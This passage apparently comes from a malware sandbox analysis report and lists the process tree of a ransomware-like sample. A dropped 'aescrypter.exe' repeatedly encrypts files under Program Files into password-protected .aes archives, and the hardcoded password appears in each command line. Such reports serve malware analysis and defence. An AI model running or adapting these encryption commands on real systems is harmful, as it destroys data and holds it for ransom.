  - System Location Discovery: System Language Discovery
  PID:2808
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\da.txt.aes" "C:\Program Files\7-Zip\Lang\da.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Executes dropped EXE
  PID:1444
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\de.txt.aes" "C:\Program Files\7-Zip\Lang\de.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2828
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\el.txt.aes" "C:\Program Files\7-Zip\Lang\el.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2028
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\eo.txt.aes" "C:\Program Files\7-Zip\Lang\eo.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Executes dropped EXE
  PID:1032
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\es.txt.aes" "C:\Program Files\7-Zip\Lang\es.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:3016
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\et.txt.aes" "C:\Program Files\7-Zip\Lang\et.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1972
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\eu.txt.aes" "C:\Program Files\7-Zip\Lang\eu.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1456
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\ext.txt.aes" "C:\Program Files\7-Zip\Lang\ext.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1684
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\fa.txt.aes" "C:\Program Files\7-Zip\Lang\fa.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1516
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\fi.txt.aes" "C:\Program Files\7-Zip\Lang\fi.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1760
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\fr.txt.aes" "C:\Program Files\7-Zip\Lang\fr.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2160
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\fur.txt.aes" "C:\Program Files\7-Zip\Lang\fur.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2140
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\fy.txt.aes" "C:\Program Files\7-Zip\Lang\fy.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2280
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\ga.txt.aes" "C:\Program Files\7-Zip\Lang\ga.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2060
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\gl.txt.aes" "C:\Program Files\7-Zip\Lang\gl.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2592
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\gu.txt.aes" "C:\Program Files\7-Zip\Lang\gu.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:484
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\he.txt.aes" "C:\Program Files\7-Zip\Lang\he.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1712
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\hi.txt.aes" "C:\Program Files\7-Zip\Lang\hi.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1140
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\hr.txt.aes" "C:\Program Files\7-Zip\Lang\hr.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1816
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\hu.txt.aes" "C:\Program Files\7-Zip\Lang\hu.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2496
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\hy.txt.aes" "C:\Program Files\7-Zip\Lang\hy.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:828
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\id.txt.aes" "C:\Program Files\7-Zip\Lang\id.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2556
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\io.txt.aes" "C:\Program Files\7-Zip\Lang\io.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1552
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\is.txt.aes" "C:\Program Files\7-Zip\Lang\is.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2020
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\it.txt.aes" "C:\Program Files\7-Zip\Lang\it.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2572
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\ja.txt.aes" "C:\Program Files\7-Zip\Lang\ja.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:2532
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\ka.txt.aes" "C:\Program Files\7-Zip\Lang\ka.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1924
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\kaa.txt.aes" "C:\Program Files\7-Zip\Lang\kaa.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1572
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\kab.txt.aes" "C:\Program Files\7-Zip\Lang\kab.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1592
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\kk.txt.aes" "C:\Program Files\7-Zip\Lang\kk.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1488
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\ko.txt.aes" "C:\Program Files\7-Zip\Lang\ko.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2760
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\ku-ckb.txt.aes" "C:\Program Files\7-Zip\Lang\ku-ckb.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:3056
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\ku.txt.aes" "C:\Program Files\7-Zip\Lang\ku.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2972
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\ky.txt.aes" "C:\Program Files\7-Zip\Lang\ky.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2780
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\lij.txt.aes" "C:\Program Files\7-Zip\Lang\lij.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1476
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\lt.txt.aes" "C:\Program Files\7-Zip\Lang\lt.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2632
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\lv.txt.aes" "C:\Program Files\7-Zip\Lang\lv.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2116
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\mk.txt.aes" "C:\Program Files\7-Zip\Lang\mk.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2708
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\mn.txt.aes" "C:\Program Files\7-Zip\Lang\mn.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:2820
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\mng.txt.aes" "C:\Program Files\7-Zip\Lang\mng.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2800
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\mng2.txt.aes" "C:\Program Files\7-Zip\Lang\mng2.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2916
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\mr.txt.aes" "C:\Program Files\7-Zip\Lang\mr.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:840
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\ms.txt.aes" "C:\Program Files\7-Zip\Lang\ms.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1536
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\nb.txt.aes" "C:\Program Files\7-Zip\Lang\nb.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2904
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\ne.txt.aes" "C:\Program Files\7-Zip\Lang\ne.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1988
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\nl.txt.aes" "C:\Program Files\7-Zip\Lang\nl.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1456
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\nn.txt.aes" "C:\Program Files\7-Zip\Lang\nn.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1860
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\pa-in.txt.aes" "C:\Program Files\7-Zip\Lang\pa-in.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2648
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\pl.txt.aes" "C:\Program Files\7-Zip\Lang\pl.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2168
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\ps.txt.aes" "C:\Program Files\7-Zip\Lang\ps.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:2528
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\pt-br.txt.aes" "C:\Program Files\7-Zip\Lang\pt-br.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2076
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\pt.txt.aes" "C:\Program Files\7-Zip\Lang\pt.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2236
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\ro.txt.aes" "C:\Program Files\7-Zip\Lang\ro.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:860
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\ru.txt.aes" "C:\Program Files\7-Zip\Lang\ru.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:448
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\sa.txt.aes" "C:\Program Files\7-Zip\Lang\sa.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1576
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\si.txt.aes" "C:\Program Files\7-Zip\Lang\si.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2208
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\sk.txt.aes" "C:\Program Files\7-Zip\Lang\sk.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1668
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\sl.txt.aes" "C:\Program Files\7-Zip\Lang\sl.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:668
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\sq.txt.aes" "C:\Program Files\7-Zip\Lang\sq.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1908
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\sr-spc.txt.aes" "C:\Program Files\7-Zip\Lang\sr-spc.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:604
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\sr-spl.txt.aes" "C:\Program Files\7-Zip\Lang\sr-spl.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1752
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\sv.txt.aes" "C:\Program Files\7-Zip\Lang\sv.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2452
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\sw.txt.aes" "C:\Program Files\7-Zip\Lang\sw.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2912
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\ta.txt.aes" "C:\Program Files\7-Zip\Lang\ta.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1680
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\tg.txt.aes" "C:\Program Files\7-Zip\Lang\tg.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:976
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\th.txt.aes" "C:\Program Files\7-Zip\Lang\th.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2552
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\tk.txt.aes" "C:\Program Files\7-Zip\Lang\tk.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:3064
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\tr.txt.aes" "C:\Program Files\7-Zip\Lang\tr.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1696
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\tt.txt.aes" "C:\Program Files\7-Zip\Lang\tt.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1644
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\ug.txt.aes" "C:\Program Files\7-Zip\Lang\ug.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:2292
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\uk.txt.aes" "C:\Program Files\7-Zip\Lang\uk.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2876
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\uz-cyrl.txt.aes" "C:\Program Files\7-Zip\Lang\uz-cyrl.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1904
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\uz.txt.aes" "C:\Program Files\7-Zip\Lang\uz.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2700
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\va.txt.aes" "C:\Program Files\7-Zip\Lang\va.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2960
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\vi.txt.aes" "C:\Program Files\7-Zip\Lang\vi.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2740
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\yo.txt.aes" "C:\Program Files\7-Zip\Lang\yo.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2524
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\zh-cn.txt.aes" "C:\Program Files\7-Zip\Lang\zh-cn.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:2620
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\zh-tw.txt.aes" "C:\Program Files\7-Zip\Lang\zh-tw.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2608
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\License.txt.aes" "C:\Program Files\7-Zip\License.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2684
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\readme.txt.aes" "C:\Program Files\7-Zip\readme.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2360
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\CompressReset.jpg.aes" "C:\Program Files\CompressReset.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1316
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\CompressSearch.rtf.aes" "C:\Program Files\CompressSearch.rtf" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1956
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\Xusage.txt.aes" "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\Xusage.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2920
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\ffjcext.zip.aes" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\ffjcext.zip" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1444
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\jre\lib\jvm.hprof.txt.aes" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\jvm.hprof.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1880
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\jre\README.txt.aes" "C:\Program Files\Java\jdk1.7.0_80\jre\README.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2924
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\jre\THIRDPARTYLICENSEREADME-JAVAFX.txt.aes" "C:\Program Files\Java\jdk1.7.0_80\jre\THIRDPARTYLICENSEREADME-JAVAFX.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1500
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\jre\THIRDPARTYLICENSEREADME.txt.aes" "C:\Program Files\Java\jdk1.7.0_80\jre\THIRDPARTYLICENSEREADME.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2668
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\artifacts.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\artifacts.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2996
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.update\platform.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.update\platform.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1196
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\dropins\README.TXT.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\dropins\README.TXT" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:2344
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\feature.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\feature.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1740
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\feature.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\feature.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2464
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.flightrecorder_5.5.0.165303\feature.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.flightrecorder_5.5.0.165303\feature.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:3012
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.ja_5.5.0.165303\feature.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.ja_5.5.0.165303\feature.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2092
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.zh_CN_5.5.0.165303\feature.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.zh_CN_5.5.0.165303\feature.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2520
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\feature.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\feature.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2088
- C:\ProgramData\local\aescrypter.exe
